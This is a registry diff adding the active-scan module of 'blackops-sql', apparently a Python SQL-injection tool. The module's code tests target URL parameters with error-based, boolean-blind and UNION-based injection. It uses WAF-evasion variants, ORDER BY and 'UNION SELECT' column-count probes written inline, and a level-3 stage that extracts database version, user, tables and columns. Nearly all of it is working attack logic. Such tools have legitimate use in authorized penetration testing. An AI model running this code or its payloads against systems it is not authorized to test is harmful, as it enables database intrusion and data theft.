blackops-sql 0.1.6__py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,526 @@
1
+ # SPDX-License-Identifier: AGPL-3.0-or-later
2
+ # Copyright (c) 2026 CommonHuman-Lab
3
+ """
4
+ BlackOpsSQL — engine/_scanner/active/
5
+ Error-based, boolean-based, and union-based SQLi detection.
6
+
7
+ Sub-modules:
8
+ - _helpers : HTTP fetch helper and response comparison utilities
9
+
10
+ All detection logic (scan_param, _test_error_based, _test_boolean, _test_union,
11
+ _detect_db_error, _find_column_count) lives here in __init__.py so that
12
+ references can be patched by tests via the package namespace.
13
+ """
14
+ from __future__ import annotations
15
+
16
+ import re
17
+ from typing import Any, Dict, List, Optional, Tuple
18
+
19
+ from ...log import get_logger
20
+ from ...reporter import ErrorBasedFinding, BooleanFinding, UnionFinding, ExtractionFinding, ScanResult
21
+ from ...http.injector import Injector
22
+ from ...http.waf_detect import EVASION_NONE
23
+ from ..options import ScanOptions
24
+ from ..payloads import (
25
+ DB_ERROR_PATTERNS,
26
+ apply_evasion,
27
+ get_error_payloads,
28
+ get_boolean_pairs,
29
+ get_db_contents_payloads,
30
+ get_enum_payloads,
31
+ make_marker,
32
+ order_by_probes,
33
+ union_null_probes,
34
+ )
35
+ from ._helpers import (
36
+ _fetch,
37
+ _diff_score,
38
+ _len_ratio,
39
+ _has_stable_boolean_signal,
40
+ _extract_marker,
41
+ _is_path_reflected,
42
+ strip_status_sentinel,
43
+ _BOOL_CONFIRM_THRESHOLD,
44
+ _BOOL_LIKELY_THRESHOLD,
45
+ _BOOL_LEN_RATIO_THRESHOLD,
46
+ )
47
+
48
+ logger = get_logger("blackopssql.active")
49
+
50
+
51
+ # ---------------------------------------------------------------------------
52
+ # Public entry point
53
+ # ---------------------------------------------------------------------------
54
+
55
+ def scan_param(
56
+ surface: Dict[str, Any],
57
+ evasions: List[str],
58
+ opts: ScanOptions,
59
+ injector: Injector,
60
+ result: ScanResult,
61
+ ) -> None:
62
+ """
63
+ Test a single injectable surface for SQLi.
64
+ surface keys: url, method, params, single_param
65
+ """
66
+ url = surface["url"]
67
+ method = surface["method"]
68
+ params = surface["params"]
69
+ param = surface["single_param"]
70
+ json_body = surface.get("json_body", False)
71
+ path_index = surface.get("path_index", 0)
72
+ second_url = getattr(opts, "second_url", "")
73
+
74
+ # Fetch a clean baseline using the original param value (not empty string),
75
+ # so the baseline represents normal application behaviour for a valid input.
76
+ baseline = _fetch(injector, url, method, params, param, None,
77
+ second_url=second_url, json_body=json_body, path_index=path_index)
78
+ if baseline is None:
79
+ return
80
+
81
+ _surface_error_found = False
82
+ _surface_boolean_found = False
83
+ _surface_union_found = False
84
+
85
+ for evasion in (evasions if evasions else [EVASION_NONE]):
86
+ if opts.use_error and not _surface_error_found:
87
+ _before = len(result.error_based)
88
+ _test_error_based(url, method, params, param, evasion, opts, injector, result,
89
+ second_url, json_body, path_index)
90
+ _surface_error_found = len(result.error_based) > _before
91
+
92
+ # Skip boolean if error or union already gave a definitive confirmation —
93
+ # both are cheaper to detect and leave no ambiguity about injectability.
94
+ _definitive_hit = _surface_error_found or _surface_union_found
95
+ if opts.use_boolean and not _definitive_hit and not _surface_boolean_found:
96
+ _before = len(result.boolean_based)
97
+ _test_boolean(url, method, params, param, baseline, evasion, opts, injector, result,
98
+ second_url, json_body, path_index)
99
+ _surface_boolean_found = len(result.boolean_based) > _before
100
+
101
+ if opts.use_union and not _surface_union_found:
102
+ _before = len(result.union_based)
103
+ _test_union(url, method, params, param, evasion, opts, injector, result,
104
+ second_url, json_body, path_index)
105
+ _surface_union_found = len(result.union_based) > _before
106
+
107
+ # Stop escalating evasions as soon as any technique confirms injection.
108
+ # Once injectable under one evasion, further WAF-bypass attempts are wasted.
109
+ if _surface_error_found or _surface_boolean_found or _surface_union_found:
110
+ break
111
+
112
+ # Level 3: run extended payload sets (db_contents + enum) via error channel
113
+ if opts.level >= 3 and opts.use_error:
114
+ evasion = evasions[0] if evasions else EVASION_NONE
115
+ _dbms = result.dbms_detected or opts.dbms
116
+ _extended = (
117
+ get_db_contents_payloads(_dbms, "tables")
118
+ + get_db_contents_payloads(_dbms, "columns")
119
+ + get_enum_payloads("version")
120
+ + get_enum_payloads("current_user")
121
+ + get_enum_payloads("current_database")
122
+ )
123
+ for raw_payload in _extended:
124
+ payload = apply_evasion(raw_payload, evasion)
125
+ resp = _fetch(injector, url, method, params, param, payload,
126
+ second_url=second_url, json_body=json_body, path_index=path_index)
127
+ if resp is None:
128
+ continue
129
+ _resp_l3 = resp
130
+ for _v in (payload, payload.upper(), payload.lower()):
131
+ _resp_l3 = _resp_l3.replace(_v, "")
132
+ dbms_hit, evidence = _detect_db_error(_resp_l3)
133
+ if dbms_hit:
134
+ result.append_error_based(ErrorBasedFinding(
135
+ url=url, parameter=param, method=method,
136
+ payload=payload, dbms=dbms_hit, evidence=evidence,
137
+ ))
138
+
139
+
140
+ # ---------------------------------------------------------------------------
141
+ # Error-based detection
142
+ # ---------------------------------------------------------------------------
143
+
144
+ def _detect_db_error(body: str) -> Tuple[str, str]:
145
+ """
146
+ Scan *body* for DB error patterns.
147
+ Returns (dbms_name, evidence_snippet) or ("", "").
148
+ """
149
+ body = strip_status_sentinel(body)
150
+ body_lower = body.lower()
151
+ # Check specific DBMSes first, then generic
152
+ for dbms in ("mysql", "mariadb", "mssql", "postgres", "sqlite", "oracle", "generic"):
153
+ for pattern in DB_ERROR_PATTERNS[dbms]:
154
+ m = re.search(pattern, body_lower)
155
+ if m:
156
+ start = max(0, m.start() - 30)
157
+ end = min(len(body), m.end() + 80)
158
+ return dbms, body[start:end].strip()
159
+ return "", ""
160
+
161
+
162
+ def _test_error_based(
163
+ url: str, method: str, params: Dict[str, str], param: str,
164
+ evasion: str, opts: ScanOptions, injector: Injector, result: ScanResult,
165
+ second_url: str = "", json_body: bool = False, path_index: int = 0,
166
+ ) -> None:
167
+ payloads = get_error_payloads(opts.dbms, opts.risk, opts.level)
168
+
169
+ for raw_payload in payloads:
170
+ payload = apply_evasion(raw_payload, evasion)
171
+ resp = _fetch(injector, url, method, params, param, payload,
172
+ second_url=second_url, json_body=json_body, path_index=path_index)
173
+ if resp is None:
174
+ continue
175
+
176
+ # Strip the injected payload from the response before checking for DB
177
+ # errors. Apps that reflect the payload in their own error message
178
+ # (e.g. "Invalid symbol: ' AND EXTRACTVALUE(...)")
179
+ _resp_clean = resp
180
+ for _v in (payload, payload.upper(), payload.lower()):
181
+ _resp_clean = _resp_clean.replace(_v, "")
182
+ dbms, evidence = _detect_db_error(_resp_clean)
183
+ if dbms:
184
+ logger.finding(
185
+ "Error-based SQLi: %s param=%s payload=%s dbms=%s",
186
+ url, param, payload, dbms,
187
+ )
188
+ result.append_error_based(ErrorBasedFinding(
189
+ url=url,
190
+ parameter=param,
191
+ method=method,
192
+ payload=payload,
193
+ dbms=dbms,
194
+ evidence=evidence,
195
+ ))
196
+ # Auto-detect DBMS for the rest of the scan
197
+ if result.dbms_detected is None and dbms != "generic":
198
+ result.dbms_detected = dbms
199
+ # One confirmed finding per param is enough
200
+ return
201
+
202
+
203
+ # ---------------------------------------------------------------------------
204
+ # Boolean-based detection
205
+ # ---------------------------------------------------------------------------
206
+
207
+ def _test_boolean(
208
+ url: str, method: str, params: Dict[str, str], param: str,
209
+ baseline: str, evasion: str, opts: ScanOptions, injector: Injector, result: ScanResult,
210
+ second_url: str = "", json_body: bool = False, path_index: int = 0,
211
+ ) -> None:
212
+ pairs = get_boolean_pairs(opts.risk, opts.level)
213
+
214
+ for raw_true, raw_false in pairs:
215
+ pt = apply_evasion(raw_true, evasion)
216
+ pf = apply_evasion(raw_false, evasion)
217
+
218
+ resp_true = _fetch(injector, url, method, params, param, pt,
219
+ second_url=second_url, json_body=json_body, path_index=path_index)
220
+ resp_false = _fetch(injector, url, method, params, param, pf,
221
+ second_url=second_url, json_body=json_body, path_index=path_index)
222
+ if resp_true is None or resp_false is None:
223
+ continue
224
+
225
+ score = _diff_score(resp_true, resp_false)
226
+ baseline_score = _diff_score(baseline, resp_true)
227
+
228
+ # Also check content-length divergence — catches tiny textual diffs
229
+ len_ratio = _len_ratio(resp_true, resp_false)
230
+ baseline_len_ratio = _len_ratio(baseline, resp_true)
231
+
232
+ # Stable-baseline boolean signal: true response matches baseline
233
+ # while false response diverges — catches single-line blind SQLi
234
+ has_stable_signal = _has_stable_boolean_signal(baseline, resp_true, resp_false)
235
+
236
+ stable_baseline = baseline_score <= _BOOL_LIKELY_THRESHOLD and baseline_len_ratio <= _BOOL_LEN_RATIO_THRESHOLD
237
+
238
+ is_likely = (score >= _BOOL_LIKELY_THRESHOLD
239
+ or (stable_baseline and len_ratio >= _BOOL_LEN_RATIO_THRESHOLD)
240
+ or has_stable_signal)
241
+ is_confirmed = (score >= _BOOL_CONFIRM_THRESHOLD
242
+ or (stable_baseline and len_ratio >= _BOOL_LEN_RATIO_THRESHOLD * 2)
243
+ or has_stable_signal)
244
+
245
+ # Ignore if true response is also different from baseline (unstable target)
246
+ if not stable_baseline and not has_stable_signal and not is_likely:
247
+ continue
248
+
249
+ if is_likely:
250
+ confirmed = is_confirmed
251
+ logger.finding(
252
+ "Boolean SQLi: %s param=%s score=%.2f len_ratio=%.4f confirmed=%s",
253
+ url, param, score, len_ratio, confirmed,
254
+ )
255
+ result.append_boolean(BooleanFinding(
256
+ url=url,
257
+ parameter=param,
258
+ method=method,
259
+ payload_true=pt,
260
+ payload_false=pf,
261
+ diff_score=score,
262
+ confirmed=confirmed,
263
+ evidence=strip_status_sentinel(resp_true)[:200],
264
+ ))
265
+ # Level 3: attempt data extraction via binary-search char extractor
266
+ if opts.level >= 3 and confirmed:
267
+ from ..extract import extract_value, get_extraction_targets
268
+ _dbms = getattr(opts, "dbms", "auto")
269
+ _surface = {"url": url, "method": method, "params": params,
270
+ "single_param": param,
271
+ "json_body": json_body, "path_index": path_index}
272
+ for _label, _expr in get_extraction_targets(_dbms):
273
+ _extracted = extract_value(
274
+ expr=_expr,
275
+ surface=_surface,
276
+ evasions=[evasion],
277
+ opts=opts,
278
+ injector=injector,
279
+ baseline=baseline,
280
+ mode="boolean",
281
+ )
282
+ if _extracted:
283
+ logger.finding("Extracted via boolean blind: %s param=%s %s=%s",
284
+ url, param, _label, _extracted)
285
+ result.append_extraction(ExtractionFinding(
286
+ url=url, parameter=param, method=method,
287
+ expr=_expr, value=_extracted, mode="boolean",
288
+ ))
289
+ return # one finding per param
290
+
291
+
292
+ # ---------------------------------------------------------------------------
293
+ # Union-based detection
294
+ # ---------------------------------------------------------------------------
295
+
296
+ def _test_union(
297
+ url: str, method: str, params: Dict[str, str], param: str,
298
+ evasion: str, opts: ScanOptions, injector: Injector, result: ScanResult,
299
+ second_url: str = "", json_body: bool = False, path_index: int = 0,
300
+ ) -> None:
301
+ # Step 1: find column count via ORDER BY
302
+ max_cols = getattr(opts, "max_union_cols", 20)
303
+ col_count = _find_column_count(url, method, params, param, evasion, injector,
304
+ second_url, max_cols, json_body, path_index)
305
+ if col_count is None:
306
+ return
307
+
308
+ # Step 2: find a reflected column
309
+ marker = make_marker()
310
+ _lite = (evasion == EVASION_NONE or evasion == "none")
311
+ probes = union_null_probes(col_count, marker, lite=_lite)
312
+
313
+ _first_http500_payload: Optional[str] = None # best candidate for HTTP-500 signal
314
+
315
+ for raw_payload in probes:
316
+ payload = apply_evasion(raw_payload, evasion)
317
+ resp = _fetch(injector, url, method, params, param, payload,
318
+ second_url=second_url, json_body=json_body, path_index=path_index)
319
+ if resp is None:
320
+ continue
321
+
322
+ # Case-insensitive check: servers may uppercase the injected value (e.g. .upper() calls)
323
+ _resp_lower = resp.lower()
324
+ _marker_lower = marker.lower()
325
+ if _marker_lower in _resp_lower:
326
+ # Resolve the actual case form as it appears in the response
327
+ _idx = _resp_lower.index(_marker_lower)
328
+ found_marker = resp[_idx : _idx + len(marker)]
329
+ # Guard 1: DB error reflection
330
+ err_dbms, _ = _detect_db_error(resp)
331
+ if err_dbms:
332
+ logger.debug(
333
+ "Union probe: marker found but response also has DB error — "
334
+ "likely error-reflected payload, skipping param=%s payload=%s",
335
+ param, payload,
336
+ )
337
+ continue
338
+ # Guard 2: URL/path reflection
339
+ if _is_path_reflected(resp, found_marker, payload):
340
+ logger.debug(
341
+ "Union probe: marker found but appears to be URL/path reflection, "
342
+ "skipping param=%s payload=%s",
343
+ param, payload,
344
+ )
345
+ continue
346
+ _disp = re.sub(r"BreachSQL_[A-Za-z0-9]+", "<marker>", payload, flags=re.IGNORECASE)
347
+ _disp = re.sub(r"\bchar\(\d[\d,]+\)", "char(<marker>)", _disp)
348
+ logger.finding(
349
+ "Union SQLi: %s param=%s cols=%d payload=%s",
350
+ url, param, col_count, _disp,
351
+ )
352
+ result.append_union(UnionFinding(
353
+ url=url,
354
+ parameter=param,
355
+ method=method,
356
+ payload=payload,
357
+ column_count=col_count,
358
+ extracted=_extract_marker(resp, found_marker),
359
+ ))
360
+ return
361
+
362
+ # HTTP 500 from a UNION probe means the injection was executed but a
363
+ # downstream template or type-cast crashed on the injected value.
364
+ # Track the first such probe; report it only if no direct reflection is found.
365
+ if "__HTTP_STATUS_500__" in resp and _first_http500_payload is None:
366
+ _first_http500_payload = payload
367
+
368
+ # No direct marker reflection found — fall back to HTTP-500 confirmation
369
+ if _first_http500_payload is not None:
370
+ _disp = re.sub(r"BreachSQL_[A-Za-z0-9]+", "<marker>", _first_http500_payload, flags=re.IGNORECASE)
371
+ logger.finding(
372
+ "Union SQLi (HTTP 500 — template crash): %s param=%s cols=%d payload=%s",
373
+ url, param, col_count, _disp,
374
+ )
375
+ result.append_union(UnionFinding(
376
+ url=url,
377
+ parameter=param,
378
+ method=method,
379
+ payload=_first_http500_payload,
380
+ column_count=col_count,
381
+ extracted="[HTTP 500 — template crash on injected value]",
382
+ ))
383
+
384
+ def _find_column_count(
385
+ url: str, method: str, params: Dict[str, str], param: str,
386
+ evasion: str, injector: Injector, second_url: str = "",
387
+ max_cols: int = 20, json_body: bool = False, path_index: int = 0,
388
+ ) -> Optional[int]:
389
+ """Determine column count using ORDER BY N probes.
390
+
391
+ Probes are generated in pairs (two comment styles per N). We track the
392
+ last N that did NOT produce a DB error or empty/changed response. As soon
393
+ as a probe causes the page to lose its normal content (error OR blank
394
+ result), we know N exceeds the real column count.
395
+
396
+ DVWA-style apps return an empty body (no data rows) rather than a DB error
397
+ when ORDER BY N exceeds the column count, so we detect both cases.
398
+ """
399
+ import re as _re
400
+ _lite = (evasion == EVASION_NONE or evasion == "none")
401
+ probes = order_by_probes(max_cols=max_cols, lite=_lite)
402
+ last_ok: Optional[int] = None
403
+
404
+ # Fetch a 'known-good' baseline to detect content disappearance
405
+ baseline_resp = _fetch(injector, url, method, params, param, None,
406
+ second_url=second_url, json_body=json_body, path_index=path_index)
407
+ baseline_words: set = set()
408
+ if baseline_resp:
409
+ baseline_words = set(w for w in baseline_resp.split() if len(w) > 4)
410
+
411
+ # Per-prefix first-seen response — used as reference when the payload changes
412
+ # the injection context
413
+ prefix_baseline: Dict[str, str] = {}
414
+
415
+ def _get_prefix(payload: str) -> str:
416
+ m2 = _re.match(r"^(\d+|['\"]?\)*)", payload)
417
+ return m2.group(1) if m2 else ""
418
+
419
+ def _response_looks_good(resp: str, prefix: str) -> bool:
420
+ pb = prefix_baseline.get(prefix)
421
+ if pb is None:
422
+ return True
423
+ ref_words = set(w for w in pb.split() if len(w) > 4)
424
+ if not ref_words:
425
+ return True
426
+ resp_words = set(w for w in resp.split() if len(w) > 4)
427
+ overlap = len(ref_words & resp_words) / max(len(ref_words), 1)
428
+ return overlap >= 0.80
429
+
430
+ seen_n: set = set()
431
+ prefix_last_ok: Dict[str, int] = {}
432
+ prefix_overflow: set = set()
433
+
434
+ for raw_payload in probes:
435
+ m = _re.search(r"ORDER BY (\d+)", raw_payload, _re.IGNORECASE)
436
+ if not m:
437
+ continue
438
+ n = int(m.group(1))
439
+ prefix = _get_prefix(raw_payload)
440
+
441
+ if prefix in prefix_overflow:
442
+ continue
443
+
444
+ payload = apply_evasion(raw_payload, evasion)
445
+ resp = _fetch(injector, url, method, params, param, payload,
446
+ second_url=second_url, json_body=json_body, path_index=path_index)
447
+ if resp is None:
448
+ continue
449
+
450
+ _, err_evidence = _detect_db_error(resp)
451
+ looks_ok = not err_evidence and _response_looks_good(resp, prefix)
452
+
453
+ if looks_ok:
454
+ if prefix not in prefix_baseline:
455
+ prefix_baseline[prefix] = resp
456
+ prefix_last_ok[prefix] = n
457
+ last_ok = max(last_ok or 0, n) or None
458
+ seen_n.add(n)
459
+ else:
460
+ p_last = prefix_last_ok.get(prefix)
461
+ if p_last is not None and n > p_last:
462
+ prefix_overflow.add(prefix)
463
+
464
+ # Early exit: once we have overflow confirmation for all seen prefixes
465
+ # that have at least one OK probe, we have enough information.
466
+ if prefix_overflow and all(
467
+ p in prefix_overflow
468
+ for p in prefix_baseline
469
+ ):
470
+ break
471
+
472
+ if prefix_overflow:
473
+ best = max(
474
+ (prefix_last_ok[p] for p in prefix_overflow if p in prefix_last_ok),
475
+ default=None,
476
+ )
477
+ if best is not None:
478
+ return best
479
+ # Fallback: ORDER BY detection failed because the app swallows DB errors
480
+ # (try/except around the query). Use UNION probes instead: when the column
481
+ # count is correct the SQL is valid and the row is returned.
482
+ if (last_ok is None or last_ok == max_cols) and baseline_resp is not None:
483
+ _fb_marker = "BSCNT_PROBE" # short, all-caps survives .upper() on the server
484
+ # Two injection styles cover the common quoting contexts; exit on first hit.
485
+ _fb_fmts = (
486
+ f"' UNION SELECT {{}}-- -",
487
+ f" UNION SELECT {{}}-- -",
488
+ f"0 UNION SELECT {{}}-- -",
489
+ )
490
+ for _n in range(1, max_cols + 1):
491
+ _inner = ",".join([f"'{_fb_marker}'"] * _n)
492
+ for _fmt in _fb_fmts:
493
+ _pl = apply_evasion(_fmt.format(_inner), evasion)
494
+ _resp = _fetch(injector, url, method, params, param, _pl,
495
+ second_url=second_url, json_body=json_body,
496
+ path_index=path_index)
497
+ if _resp is None:
498
+ continue
499
+ # Direct reflection: marker appears in rendered text
500
+ if _fb_marker.lower() in _resp.lower():
501
+ return _n
502
+ # Template crash: UNION was syntactically valid but a float-format
503
+ # Jinja filter blew up on a NULL/string value — still a hit.
504
+ if "__HTTP_STATUS_500__" in _resp:
505
+ return _n
506
+ return last_ok
507
+
508
+ __all__ = [
509
+ "scan_param",
510
+ # helpers
511
+ "_fetch",
512
+ "_diff_score",
513
+ "_len_ratio",
514
+ "_has_stable_boolean_signal",
515
+ "_extract_marker",
516
+ "_is_path_reflected",
517
+ "strip_status_sentinel",
518
+ # detection
519
+ "_detect_db_error",
520
+ "_test_error_based",
521
+ "_test_boolean",
522
+ "_test_union",
523
+ "_find_column_count",
524
+ # re-exported from payloads (for backward compat / patching)
525
+ "make_marker",
526
+ ]